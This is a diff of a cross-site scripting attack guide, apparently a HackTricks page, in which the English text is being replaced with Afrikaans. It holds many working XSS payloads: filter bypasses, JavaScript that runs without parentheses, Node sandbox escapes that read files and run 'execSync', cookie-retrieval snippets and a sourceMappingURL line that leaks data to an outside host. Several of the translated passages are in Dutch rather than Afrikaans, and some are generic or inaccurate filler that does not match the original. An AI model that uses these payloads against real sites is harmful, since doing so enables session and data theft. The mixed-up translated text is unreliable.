 data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==
 ```
+**Plekke waar jy hierdie protokolle kan inspuit**
 
-**Places where you can inject these protocols**
-
-**In general** the `javascript:` protocol can be **used in any tag that accepts the attribute `href`** and in **most** of the tags that accepts the **attribute `src`** (but not `
 
@@ -368,33 +373,27 @@ data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc
 
 
 //Special cases
- .//https://github.com/evilcos/xss.swf 
- //https://github.com/evilcos/xss.swf 
+ .//https://github.com/evilcos/xss.swf
+ //https://github.com/evilcos/xss.swf
 
 ```
+Let daarop dat as jy probeer om **beide** `URLencode + HTMLencode` in enige volgorde te gebruik om die **payload** te enkodeer, sal dit **nie werk nie**, maar jy kan hulle **binne die payload meng**.
 
-Note that if you try to **use both** `URLencode + HTMLencode` in any order to encode the **payload** it **won't** **work**, but you can **mix them inside the payload**.
-
-**Using Hex and Octal encode with `javascript:`**
-
-You can use **Hex** and **Octal encode** inside the `src` attribute of `iframe` (at least) to declare **HTML tags to execute JS**:
+**Die gebruik van Hex en Octal enkodeer met `javascript:`**
 
+Jy kan **Hex** en **Octal enkodeer** binne die `src` eienskap van `iframe` (ten minste) gebruik om **HTML-etikette uit te voer**:
 ```javascript
 //Encoded: 
 // This WORKS
@@ -406,14 +405,17 @@ You can use **Hex** and **Octal encode** inside the `src` attribute of `iframe`
 
 
 ```
+### Omgekeerde tab nabbing
 
-### Reverse tab nabbing
+Reverse tab nabbing is een aanvalstechniek die wordt gebruikt om gebruikers te misleiden en hun vertrouwelijke informatie te stelen. Bij deze aanval wordt een kwaadwillende website gemaakt die eruitziet als een legitieme website waar de gebruiker al ingelogd is. Wanneer de gebruiker op een link klikt en naar een andere tabblad navigeert, wordt het oorspronkelijke tabblad vervangen door de kwaadwillende website. Hierdoor kan de aanvaller de inloggegevens en andere vertrouwelijke informatie van de gebruiker stelen.
 
+Om deze aanval uit te voeren, maakt de aanvaller gebruik van JavaScript om de locatie van het oorspronkelijke tabblad te wijzigen naar de kwaadwillende website. Dit kan worden bereikt door de `window.opener.location` eigenschap te wijzigen. Zodra het oorspronkelijke tabblad is vervangen, kan de aanvaller de ingevoerde gegevens onderscheppen en deze naar een externe server sturen.
+
+Om jezelf te beschermen tegen reverse tab nabbing, is het belangrijk om altijd alert te zijn op verdachte websites en links. Zorg ervoor dat je alleen vertrouwde websites bezoekt en vermijd het klikken op verdachte links. Daarnaast is het ook aan te raden om een up-to-date antivirusprogramma en een firewall te gebruiken om jezelf te beschermen tegen dergelijke aanvallen.
 ```javascript
  //No safari
 
@@ -438,18 +439,14 @@ Firefox: %09 %20 %28 %2C %3B
 Opera: %09 %20 %2C %3B
 Android: %09 %20 %28 %2C %3B
 ```
+### XSS in "Onuitbuitbare etikette" (verborge invoer, skakel, kanonieke, meta)
 
-### XSS in "Unexploitable tags" (hidden input, link, canonical, meta)
-
-From [**here**](https://portswigger.net/research/exploiting-xss-in-hidden-inputs-and-meta-tags) **it's now possible to abuse hidden inputs with:**
-
+Vanaf [**hier**](https://portswigger.net/research/exploiting-xss-in-hidden-inputs-and-meta-tags) **is dit nou moontlik om verborge invoere te misbruik met:**
 ```html
 
 
@@ -457,84 +454,76 @@ And in **meta tags**:
 
 
Newsletter popup

 ```
-
-From [**here**](https://portswigger.net/research/xss-in-hidden-input-fields): You can execute an **XSS payload inside a hidden attribute**, provided you can **persuade** the **victim** into pressing the **key combination**. On Firefox Windows/Linux the key combination is **ALT+SHIFT+X** and on OS X it is **CTRL+ALT+X**. You can specify a different key combination using a different key in the access key attribute. Here is the vector:
-
+Vanaf [**hier**](https://portswigger.net/research/xss-in-hidden-input-fields): Jy kan 'n **XSS-payload binne 'n verborge atribuut** uitvoer, mits jy die **slagoffer** kan **oortuig** om die **sleutelkombinasie** te druk. Op Firefox Windows/Linux is die sleutelkombinasie **ALT+SHIFT+X** en op OS X is dit **CTRL+ALT+X**. Jy kan 'n ander sleutelkombinasie spesifiseer deur 'n ander sleutel in die toegangssleutel-atribuut te gebruik. Hier is die vektor:
 ```markup
 
 ```
+**Die XSS-lading sal soos volg wees: `" accesskey="x" onclick="alert(1)" x="`**
 
-**The XSS payload will be something like this: `" accesskey="x" onclick="alert(1)" x="`**
+### Swartlys omseilings
 
-### Blacklist Bypasses
+Verskeie truuks met die gebruik van verskillende kodering is reeds in hierdie gedeelte blootgestel. Gaan **terug om te leer waar jy dit kan gebruik:**
 
-Several tricks with using different encoding were exposed already inside this section. Go **back to learn where can you use:**
+* **HTML-kodering (HTML-etikette)**
+* **Unicode-kodering (kan geldige JS-kode wees):** `\u0061lert(1)`
+* **URL-kodering**
+* **Hex- en oktaalkodering**
+* **data-kodering**
 
-* **HTML encoding (HTML tags)**
-* **Unicode encoding (can be valid JS code):** `\u0061lert(1)`
-* **URL encoding**
-* **Hex and Octal encoding**
-* **data encoding**
+**Omseilings vir HTML-etikette en eienskappe**
 
-**Bypasses for HTML tags and attributes**
+Lees die [Swartlys omseilings van die vorige gedeelte](./#blacklist-bypasses).
 
-Read the[ Blacklist Bypasses of the previous section](./#blacklist-bypasses).
+**Omseilings vir JavaScript-kode**
 
-**Bypasses for JavaScript code**
-
-Read the J[avaScript bypass blacklist of the following section](./#javascript-bypass-blacklists-techniques).
+Lees die [JavaScript omseilingswartlys van die volgende gedeelte](./#javascript-bypass-blacklists-techniques).
 
 ### CSS-Gadgets
 
-If you found a **XSS in a very small part** of the web that requires some kind of interaction (maybe a small link in the footer with an onmouseover element), you can try to **modify the space that element occupies** to maximize the probabilities of have the link fired.
+As jy 'n **XSS in 'n baie klein deel** van die web gevind het wat enige vorm van interaksie vereis (miskien 'n klein skakel in die voetskrif met 'n onmouseover-element), kan jy probeer om **die spasie wat die element inneem te wysig** om die waarskynlikheid te maksimeer dat die skakel geaktiveer word.
 
-For example, you could add some styling in the element like: `position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5`
+Byvoorbeeld, jy kan enige stylings in die element byvoeg soos: `position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5`
 
-But, if the WAF is filtering the style attribute, you can use CSS Styling Gadgets, so if you find, for example
+Maar as die WAF die styl-eienskap filter, kan jy CSS Styling Gadgets gebruik. As jy byvoorbeeld die volgende vind:
 
 > .test {display:block; color: blue; width: 100%\}
 
-and
+en
 
 > \#someid {top: 0; font-family: Tahoma;}
 
-Now you can modify our link and bring it to the form
+Kan jy nou ons skakel wysig en dit na die vorm bring:
 
 > \
 
-This trick was taken from [https://medium.com/@skavans\_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703](https://medium.com/@skavans\_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703)
+Hierdie truuk is geneem van [https://medium.com/@skavans\_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703](https://medium.com/@skavans\_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703)
 
-## Injecting inside JavaScript code
+## Injeksie binne JavaScript-kode
 
-In these case you **input** is going to be **reflected inside the JS code** of a `.js` file or between `` tags or between HTML events that can execute JS code or between attributes that accepts the `javascript:` protocol.
+In hierdie geval sal jou **inset** binne die JS-kode van 'n `.js`-lêer of tussen ``-etikette of tussen HTML-gebeure wat JS-kode kan uitvoer of tussen eienskappe wat die `javascript:`-protokol aanvaar, weerspieël word.
 
-### Escaping \` you could easily **escape closing the `` ingevoeg word, kan jy maklik die sluiting van die `
 ```
+Let wel dat ons in hierdie voorbeeld **nie eens die enkel aanhalingsteken gesluit het nie**. Dit is omdat **HTML-analise eers deur die blaaier uitgevoer word**, wat betrokke is by die identifisering van bladsyelemente, insluitend blokke van skrips. Die analisering van JavaScript om die ingeslote skrips te verstaan en uit te voer, word eers daarna uitgevoer.
 
-Note that in this example we **haven't even closed the single quote**. This is because **HTML parsing is performed first by the browser**, which involves identifying page elements, including blocks of script. The parsing of JavaScript to understand and execute the embedded scripts is only carried out afterward.
-
-### Inside JS code
-
-If `<>` are being sanitised you can still **escape the string** where your input is being **located** and **execute arbitrary JS**. It's important to **fix JS syntax**, because if there are any errors, the JS code won't be executed:
+### Binne JS-kode
 
+As `<>` gesaniteer word, kan jy steeds die tekenreekse **ontvlug** waar jou insette **geplaas** word en **arbitrêre JS uitvoer**. Dit is belangrik om die JS-sintaksie **te herstel**, want as daar enige foute is, sal die JS-kode nie uitgevoer word nie:
 ```
 '-alert(document.domain)-'
 ';alert(document.domain)//
 \';alert(document.domain)//
 ```
+### Sjabloonliterale \`\`
 
-### Template literals \`\`
-
-In order to construct **strings** apart from single and double quotes JS also accepts **backticks** **` `` `** . This is known as template literals as they allow to **embedded JS expressions** using `${ ... }` syntax.\
-Therefore, if you find that your input is being **reflected** inside a JS string that is using backticks, you can abuse the syntax `${ ... }` to execute **arbitrary JS code**:
-
-This can be **abused** using:
+Om **strings** te konstrueer, aanvaar JS ook **backticks** **` `` `** afgesien van enkel- en dubbele aanhalingstekens. Dit staan bekend as sjabloonliterale omdat dit toelaat om **ingebedde JS-uitdrukkings** te gebruik deur middel van die sintaksis `${ ... }`.\
+Daarom, as jy vind dat jou inset binne 'n JS-string wat backticks gebruik, **weerspieël** word, kan jy die sintaksis `${ ... }` misbruik om **willekeurige JS-kode** uit te voer:
 
+Dit kan **misbruik** word deur gebruik te maak van:
 ```javascript
 `${alert(1)}`
 `${`${`${`${alert(1)}`}`}`}`
@@ -545,28 +534,49 @@ This can be **abused** using:
 function loop(){return loop}
 loop``````````````
 ```````````````
+### Gekodeerde kode-uitvoering
 
-### Encoded code execution
+In sommige gevallen kan een aanvaller proberen om kwaadaardige code uit te voeren door deze te coderen voordat deze naar de server wordt verzonden. Dit kan worden gedaan om detectie te voorkomen of om beveiligingsmaatregelen te omzeilen.
 
+Een veelvoorkomende techniek is het gebruik van URL-encodering om speciale tekens te vervangen door hun hexadecimale equivalent. Bijvoorbeeld, de code `` kan worden gecodeerd als `%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E`.
+
+Deze gecodeerde code kan vervolgens worden ingevoegd in een kwetsbaar veld op een webpagina, zoals een invoerveld of een querystring-parameter. Wanneer de server de gecodeerde code ontvangt en decodeert, wordt de kwaadaardige code uitgevoerd.
+
+Om deze techniek te misbruiken, moet de aanvaller weten hoe de server de gecodeerde invoer decodeert. Dit kan worden ontdekt door het bestuderen van de client-side code of door het uitvoeren van reverse engineering op de server-side code.
+
+Het is belangrijk voor ontwikkelaars om invoer correct te valideren en te saneren om dit soort aanvallen te voorkomen. Het gebruik van een Content Security Policy (CSP) kan ook helpen bij het beperken van de impact van gecodeerde code-uitvoering.
 ```markup
 
 
 ```
+**Javascript binne 'n kommentaar**
 
-**Javascript inside a comment**
+Wanneer 'n kommentaarveld op 'n webwerf nie behoorlik gevalideer word nie, kan dit 'n potensiële veiligheidsrisiko skep. 'n Aanvaller kan kwaadwillige Javascript-kode insluit binne 'n kommentaarveld, wat uitgevoer kan word wanneer die webwerf dit verwerk. Hierdie tipe aanval staan bekend as 'n XSS (Cross-Site Scripting) aanval.
 
+Om hierdie tipe aanval uit te voer, kan 'n aanvaller die volgende kode insluit binne 'n kommentaarveld:
+
+```html
+
+```
+
+Wanneer die webwerf hierdie kommentaarveld verwerk, sal die Javascript-kode uitgevoer word en 'n waarskuwing met die teks "XSS aanval" sal vertoon word. Dit kan gevaarlik wees, veral as die aanvaller kwaadwillige kode insluit wat persoonlike inligting steel of die webwerf se funksionaliteit ontwrig.
+
+Om XSS-aanvalle te voorkom, moet webwerwe behoorlike invoervalidering en ontsmetting toepas op alle gebruikersinsette, insluitend kommentaarvelde. Dit sal help om die uitvoering van kwaadwillige kode te voorkom en die veiligheid van die webwerf te verseker.
 ```javascript
 //If you can only inject inside a JS comment, you can still leak something
 //If the user opens DevTools request to the indicated sourceMappingURL will be send
 
 //# sourceMappingURL=https://evdr12qyinbtbd29yju31993gumlaby0.oastify.com
 ```
+**JavaScript sonder hakies**
 
-**JavaScript without parentheses**
+In JavaScript is dit moontlik om 'n funksie op te roep sonder om hakies te gebruik. Hierdie tegniek maak gebruik van die feit dat JavaScript die funksie self as 'n waarde behandel. 
 
+Byvoorbeeld, in plaas van `myFunction()`, kan jy `myFunction` skryf. Hierdie sintaksis sal die funksie nie onmiddellik uitvoer nie, maar eerder die funksie self as 'n waarde teruggee. 
+
+Dit kan nuttig wees in sekere situasies, soos wanneer jy 'n funksie wil deurgee as 'n argument na 'n ander funksie. 
+
+Dit is belangrik om op te let dat hierdie tegniek slegs werk as die funksie geen argumente aanvaar nie. As die funksie argumente vereis, sal jy steeds hakies moet gebruik.
 ````javascript
 // By setting location
 window.location='javascript:alert\x281\x29'
 x=new DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x
-  // or any DOMXSS sink such as location=name
+// or any DOMXSS sink such as location=name
 
 // Backtips
-  // Backtips pass the string as an array of lenght 1
+// Backtips pass the string as an array of lenght 1
 alert`1`
 
 // Backtips + Tagged Templates + call/apply
@@ -675,35 +712,35 @@ eval.apply`${[`alert\x281\x29`]}`
 [].sort.call`${alert}1337`
 [].map.call`${eval}\\u{61}lert\x281337\x29`
 
-  // To pass several arguments you can use
+// To pass several arguments you can use
 function btt(){
-    console.log(arguments);
+console.log(arguments);
 }
 btt`${'arg1'}${'arg2'}${'arg3'}`
 
-  //It's possible to construct a function and call it
+//It's possible to construct a function and call it
 Function`x${'alert(1337)'}x```
 
-  // .replace can use regexes and call a function if something is found
+// .replace can use regexes and call a function if something is found
 "a,".replace`a${alert}` //Initial ["a"] is passed to str as "a," and thats why the initial string is "a,"
 "a".replace.call`1${/./}${alert}`
-  // This happened in the previous example
-  // Change "this" value of call to "1,"
-  // match anything with regex /./
-  // call alert with "1"
+// This happened in the previous example
+// Change "this" value of call to "1,"
+// match anything with regex /./
+// call alert with "1"
 "a".replace.call`1337${/..../}${alert}` //alert with 1337 instead
 
-  // Using Reflect.apply to call any function with any argumnets
+// Using Reflect.apply to call any function with any argumnets
 Reflect.apply.call`${alert}${window}${[1337]}` //Pass the function to call (“alert”), then the “this” value to that function (“window”) which avoids the illegal invocation error and finally an array of arguments to pass to the function.
 Reflect.apply.call`${navigation.navigate}${navigation}${[name]}`
-  // Using Reflect.set to call set any value to a variable
+// Using Reflect.set to call set any value to a variable
 Reflect.set.call`${location}${'href'}${'javascript:alert\x281337\x29'}` // It requires a valid object in the first argument (“location”), a property in the second argument and a value to assign in the third.
 
 
 
 // valueOf, toString
-  // These operations are called when the object is used as a primitive
-  // Because the objet is passed as "this" and alert() needs "window" to be the value of "this", "window" methods are used
+// These operations are called when the object is used as a primitive
+// Because the objet is passed as "this" and alert() needs "window" to be the value of "this", "window" methods are used
 valueOf=alert;window+''
 toString=alert;window+''
 
@@ -715,28 +752,26 @@ onerror=eval;throw"=alert\x281\x29";
 {onerror=eval}throw"=alert(1)" //No ";"
 onerror=alert //No ";" using new line
 throw 1337
-  // Error handler + Special unicode separators
-eval("onerror=\u2028alert\u2029throw 1337"); 
-  // Error handler + Comma separator
-  // The comma separator goes through the list and returns only the last element
+// Error handler + Special unicode separators
+eval("onerror=\u2028alert\u2029throw 1337");
+// Error handler + Comma separator
+// The comma separator goes through the list and returns only the last element
 var a = (1,2,3,4,5,6) // a = 6
 throw onerror=alert,1337 // this is throw 1337, after setting the onerror event to alert
 throw onerror=alert,1,1,1,1,1,1337
-  // optional exception variables inside a catch clause.
+// optional exception variables inside a catch clause.
 try{throw onerror=alert}catch{throw 1}
 
 
 // Has instance symbol
 'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}
 'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}
-  // The “has instance” symbol allows you to customise the behaviour of the instanceof operator, if you set this symbol it will pass the left operand to the function defined by the symbol.
+// The “has instance” symbol allows you to customise the behaviour of the instanceof operator, if you set this symbol it will pass the left operand to the function defined by the symbol.
 ````
-
 * [https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md](https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md)
 * [https://portswigger.net/research/javascript-without-parentheses-using-dommatrix](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix)
 
-**Arbitrary function (alert) call**
-
+**Willekeurige funksie (alert) oproep**
 ````javascript
 //Eval like functions
 eval('ale'+'rt(1)')
@@ -750,8 +785,8 @@ import('data:text/javascript,alert(1)')
 //General function executions
 `` //Can be use as parenthesis
 alert`document.cookie`
-alert(document['cookie']) 
-with(document)alert(cookie) 
+alert(document['cookie'])
+with(document)alert(cookie)
 (alert)(1)
 (alert(1))in"."
 a=alert,a(1)
@@ -796,50 +831,68 @@ top['al\x65rt'](1)
 top[8680439..toString(30)](1)
 
 ````
+## **DOM kwesbaarhede**
 
-## **DOM vulnerabilities**
-
-There is **JS code** that is using **unsafely data controlled by an attacker** like `location.href` . An attacker, could abuse this to execute arbitrary JS code.\
-**Due to the extension of the explanation of** [**DOM vulnerabilities it was moved to this page**](dom-xss.md)**:**
+Daar is **JS-kode** wat **onveilig deur 'n aanvaller beheerde data** soos `location.href` gebruik. 'n Aanvaller kan dit misbruik om willekeurige JS-kode uit te voer.\
+**As gevolg van die uitbreiding van die verduideliking van** [**DOM kwesbaarhede is dit na hierdie bladsy verskuif**](dom-xss.md)**:**
 
 {% content-ref url="dom-xss.md" %}
 [dom-xss.md](dom-xss.md)
 {% endcontent-ref %}
 
-There you will find a detailed **explanation of what DOM vulnerabilities are, how are they provoked, and how to exploit them**.\
-Also, don't forget that **at the end of the mentioned post** you can find an explanation about [**DOM Clobbering attacks**](dom-xss.md#dom-clobbering).
+Daar sal jy 'n gedetailleerde **verduideliking van wat DOM kwesbaarhede is, hoe hulle veroorsaak word, en hoe om dit uit te buit** vind.\
+Moenie ook vergeet dat **aan die einde van die genoemde pos** 'n verduideliking oor [**DOM Clobbering-aanvalle**](dom-xss.md#dom-clobbering) gevind kan word.
 
-## Other Bypasses
+## Ander omseilings
 
-### Normalised Unicode
+### Gestandaardiseerde Unicode
 
-You could check is the **reflected values** are being **unicode normalized** in the server (or in the client side) and abuse this functionality to bypass protections. [**Find an example here**](../unicode-injection/#xss-cross-site-scripting).
-
-### PHP FILTER\_VALIDATE\_EMAIL flag Bypass
+Jy kan nagaan of die **weerspieëlde waardes** in die bediener (of aan die kliëntkant) **genormaliseerde Unicode** is en hierdie funksionaliteit misbruik om beskerming te omseil. [**Vind 'n voorbeeld hier**](../unicode-injection/#xss-cross-site-scripting).
 
+### PHP FILTER\_VALIDATE\_EMAIL-vlag omseiling
 ```javascript
 ">"@x.y
 ```
+### Ruby-On-Rails omseiling
 
-### Ruby-On-Rails bypass
-
-Due to **RoR mass assignment** quotes are inserted in the HTML and then the quote restriction is bypassed and additoinal fields (onfocus) can be added inside the tag.\
-Form example ([from this report](https://hackerone.com/reports/709336)), if you send the payload:
-
+As gevolg van **RoR massa-toewysing** word aanhalingstekens ingevoeg in die HTML en dan word die aanhalingstekenbeperking omseil en addisionele velde (onfocus) kan binne die tag bygevoeg word.\
+Vormvoorbeeld ([van hierdie verslag](https://hackerone.com/reports/709336)), as jy die lading stuur:
 ```
 contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa
 ```
-
-The pair "Key","Value" will be echoed back like this:
-
+Die paar "Key","Value" sal soos volg teruggestuur word:
 ```
 {" onfocus=javascript:alert('xss') autofocus a"=>"a"}
 ```
+### Spesiale kombinasies
 
-Then, the onfocus attribute will be inserted and XSS occurs.
+In some cases, the onfocus attribute can be combined with other HTML attributes to create more complex XSS attacks. Here are some examples:
 
-### Special combinations
+#### 1. onfocus + onload
 
+```html
+
@@ -999,23 +1040,21 @@ If the page is returnin a text/xml content-type it's possible to indicate a name
 
 
 ```
+### Spesiale Vervangingspatrone
 
-### Special Replacement Patterns
+Wanneer iets soos **`"some {{template}} data".replace("{{template}}", )`** gebruik word. Die aanvaller kan [**spesiale stringvervanging**](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global\_Objects/String/replace#specifying\_a\_string\_as\_the\_replacement) gebruik om te probeer om sekere beskermings te omseil: ``"123 {{template}} 456".replace("{{template}}", JSON.stringify({"name": "$'$`alert(1)//"}))``
 
-When something like **`"some {{template}} data".replace("{{template}}", )`** is used. The attacker could use [**special string replacements**](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global\_Objects/String/replace#specifying\_a\_string\_as\_the\_replacement) to try to bypass some protections: ``"123 {{template}} 456".replace("{{template}}", JSON.stringify({"name": "$'$`alert(1)//"}))``
+Byvoorbeeld in [**hierdie skryfstuk**](https://gitea.nitowa.xyz/nitowa/PlaidCTF-YACA), is dit gebruik om 'n JSON-string binne 'n skripsie te ontsnap en willekeurige kode uit te voer.
 
-For example in [**this writeup**](https://gitea.nitowa.xyz/nitowa/PlaidCTF-YACA), this was used to **scape a JSON string** inside a script and execute arbitrary code.
-
-### Chrome Cache to XSS
+### Chrome Cache na XSS
 
 {% content-ref url="chrome-cache-to-xss.md" %}
 [chrome-cache-to-xss.md](chrome-cache-to-xss.md)
 {% endcontent-ref %}
 
-### XS Jails Escape
-
-If you are only have a limited set of chars to use, check these other valid solutions for XSJail problems:
+### XS Jails Ontsnapping
 
+As jy slegs 'n beperkte stel karakters het om te gebruik, kyk na hierdie ander geldige oplossings vir XSJail-probleme:
 ```javascript
 // eval + unescape + regex
 eval(unescape(/%2f%0athis%2econstructor%2econstructor(%22return(process%2emainModule%2erequire(%27fs%27)%2ereadFileSync(%27flag%2etxt%27,%27utf8%27))%22)%2f/))()
@@ -1024,49 +1063,44 @@ eval(unescape(1+/1,this%2evalueOf%2econstructor(%22process%2emainModule%2erequir
 // use of with
 with(console)log(123)
 with(/console.log(1)/)with(this)with(constructor)constructor(source)()
-  // Just replace console.log(1) to the real code, the code we want to run is:
-  //return String(process.mainModule.require('fs').readFileSync('flag.txt'))
+// Just replace console.log(1) to the real code, the code we want to run is:
+//return String(process.mainModule.require('fs').readFileSync('flag.txt'))
 
 with(process)with(mainModule)with(require('fs'))return(String(readFileSync('flag.txt')))
 with(k='fs',n='flag.txt',process)with(mainModule)with(require(k))return(String(readFileSync(n)))
 with(String)with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)with(mainModule)with(require(k))return(String(readFileSync(n)))
 
-  //Final solution
+//Final solution
 with(
-  /with(String)
-    with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)
-      with(mainModule)
-        with(require(k))
-          return(String(readFileSync(n)))
-  /)
+/with(String)
+with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)
+with(mainModule)
+with(require(k))
+return(String(readFileSync(n)))
+/)
 with(this)
-  with(constructor)
-    constructor(source)()
+with(constructor)
+constructor(source)()
 
 // For more uses of with go to challenge misc/CaaSio PSE in
 // https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#misc/CaaSio%20PSE
 ```
+As **alles ongedefinieerd is** voor die uitvoering van onbetroubare kode (soos in [**hierdie verslag**](https://blog.huli.tw/2022/02/08/en/what-i-learned-from-dicectf-2022/#miscx2fundefined55-solves)), is dit moontlik om nuttige objekte "uit niks" te genereer om die uitvoering van willekeurige onbetroubare kode te misbruik:
 
-If **everything is undefined** before executing untrusted code (like in [**this writeup**](https://blog.huli.tw/2022/02/08/en/what-i-learned-from-dicectf-2022/#miscx2fundefined55-solves)) it's possible to generate useful objects "out of nothing" to abuse the execution of arbitrary untrusted code:
-
-* Using import()
-
+* Deur import() te gebruik
 ```javascript
 // although import "fs" doesn’t work, import('fs') does.
 import("fs").then(m=>console.log(m.readFileSync("/flag.txt", "utf8")))
 ```
+* Toegang tot `require` op 'n indirekte manier
 
-* Accessing `require` indirectly
-
-[According to this](https://stackoverflow.com/questions/28955047/why-does-a-module-level-return-statement-work-in-node-js/28955050#28955050) modules are wrapped by Node.js within a function, like this:
-
+[Volgens hierdie](https://stackoverflow.com/questions/28955047/why-does-a-module-level-return-statement-work-in-node-js/28955050#28955050) word modules deur Node.js binne 'n funksie gewikkel, soos hierdie:
 ```javascript
 (function (exports, require, module, __filename, __dirname) {
-    // our actual module code
+// our actual module code
 });
 ```
-
-Therefore, if from that module we can **call another function**, it's possible to use `arguments.callee.caller.arguments[1]` from that function to access **`require`**:
+Daarom, as ons van daardie module **'n ander funksie kan oproep**, is dit moontlik om `arguments.callee.caller.arguments[1]` van daardie funksie te gebruik om toegang te verkry tot **`require`**:
 
 {% code overflow="wrap" %}
 ```javascript
@@ -1074,65 +1108,62 @@ Therefore, if from that module we can **call another function**, it's possible t
 ```
 {% endcode %}
 
-In a similar way to the previous example, it's possible to **use error handlers** to access the **wrapper** of the module and get the **`require`** function:
-
+Op 'n soortgelyke manier as die vorige voorbeeld, is dit moontlik om **fouthanteraars te gebruik** om toegang te verkry tot die **wrapping** van die module en die **`require`**-funksie te kry:
 ```javascript
 try {
-	null.f()
+null.f()
 } catch (e) {
-	TypeError = e.constructor
+TypeError = e.constructor
 }
 Object = {}.constructor
 String = ''.constructor
 Error = TypeError.prototype.__proto__.constructor
 function CustomError() {
-	const oldStackTrace = Error.prepareStackTrace
-	try {
-		Error.prepareStackTrace = (err, structuredStackTrace) => structuredStackTrace
-		Error.captureStackTrace(this)
-		this.stack
-	} finally {
-		Error.prepareStackTrace = oldStackTrace
-	}
+const oldStackTrace = Error.prepareStackTrace
+try {
+Error.prepareStackTrace = (err, structuredStackTrace) => structuredStackTrace
+Error.captureStackTrace(this)
+this.stack
+} finally {
+Error.prepareStackTrace = oldStackTrace
+}
 }
 function trigger() {
-	const err = new CustomError()
-	console.log(err.stack[0])
-	for (const x of err.stack) {
-		// use x.getFunction() to get the upper function, which is the one that Node.js adds a wrapper to, and then use arugments to get the parameter
-		const fn = x.getFunction()
-		console.log(String(fn).slice(0, 200))
-		console.log(fn?.arguments)
-		console.log('='.repeat(40))
-		if ((args = fn?.arguments)?.length > 0) {
-			req = args[1]
-			console.log(req('child_process').execSync('id').toString())
-		}
-	}
+const err = new CustomError()
+console.log(err.stack[0])
+for (const x of err.stack) {
+// use x.getFunction() to get the upper function, which is the one that Node.js adds a wrapper to, and then use arugments to get the parameter
+const fn = x.getFunction()
+console.log(String(fn).slice(0, 200))
+console.log(fn?.arguments)
+console.log('='.repeat(40))
+if ((args = fn?.arguments)?.length > 0) {
+req = args[1]
+console.log(req('child_process').execSync('id').toString())
+}
+}
 }
 trigger()
 ```
+### Verduistering en Gevorderde Omzeiling
 
-### Obfuscation & Advanced Bypass
-
-* **Different obfuscations in one page:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/)
+* **Verskillende verduisteringsmetodes op een bladsy:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/)
 * [https://github.com/aemkei/katakana.js](https://github.com/aemkei/katakana.js)
 * [https://ooze.ninja/javascript/poisonjs](https://ooze.ninja/javascript/poisonjs)
 * [https://javascriptobfuscator.herokuapp.com/](https://javascriptobfuscator.herokuapp.com)
 * [https://skalman.github.io/UglifyJS-online/](https://skalman.github.io/UglifyJS-online/)
 * [http://www.jsfuck.com/](http://www.jsfuck.com)
-* More sofisticated JSFuck: [https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce](https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce)
+* Meer gesofistikeerde JSFuck: [https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce](https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce)
 * [http://utf-8.jp/public/jjencode.html](http://utf-8.jp/public/jjencode.html)
 * [https://utf-8.jp/public/aaencode.html](https://utf-8.jp/public/aaencode.html)
 * [https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses](https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses)
-
 ```javascript
 //Katana
 
 ```
 
 ```javascript
-//JJencode 
+//JJencode
 
 ```
 
@@ -1149,17 +1180,15 @@ trigger()
 ```javascript
 // It's also possible to execute JS code only with the chars: []`+!${}
 ```
+## XSS algemene payloads
 
-## XSS common payloads
-
-### Several payloads in 1
+### Verskeie payloads in 1
 
 {% content-ref url="steal-info-js.md" %}
 [steal-info-js.md](steal-info-js.md)
 {% endcontent-ref %}
 
-### Retrieve Cookies
-
+### Haal Koekies op
 ```javascript
 /?c="+document.cookie>
 
@@ -1181,28 +1210,44 @@ trigger()
 
 
 ```
-
 {% hint style="info" %}
-You **won't be able to access the cookies from JavaScript** if the HTTPOnly flag is set in the cookie. But here you have [some ways to bypass this protection](../hacking-with-cookies/#httponly) if you are lucky enough.
